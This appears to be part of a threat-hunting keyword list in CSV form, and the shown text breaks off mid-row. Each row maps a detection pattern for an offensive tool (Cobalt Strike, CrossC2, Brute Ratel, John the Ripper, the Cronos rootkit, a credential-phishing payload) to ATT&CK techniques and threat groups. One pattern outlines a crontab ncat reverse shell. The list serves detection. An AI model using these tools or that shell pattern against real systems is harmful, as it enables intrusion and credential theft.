+"*Credz-Plz-Execute.txt*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*cribdragg3r/Alaris*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*crimeware*/zeus.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*crisis_monitor start*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*crisis_monitor stop*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - 
T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*crisprss/PrintSpoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*crk_get_key1*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_get_key2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*crk_max_keys_per_crypt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*crk_methods.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*crk_password_loop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*Cronos Rootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
+"*CronosDebugger.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
+"*CronosRootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*crontab* sleep *ncat * -e /bin/bash*crontab*","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","POST Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*CrossC2 beacon*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2 dyn load*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2 framework*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2.cna*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2.cna*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2.git*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2.Linux*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2.MacOS*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2.Win*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2_dev_*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - 
T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2_entry*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2_portscan.*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*crossc2_serverscan.*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*CrossC2Beacon*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2-cs*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2-GithubBot*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2Kit","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2Kit.*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*CrossC2Kit.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*CrossC2Kit.git*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*CrossC2Kit_demo*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*crossc2kit_latest*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2Kit_Loader*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
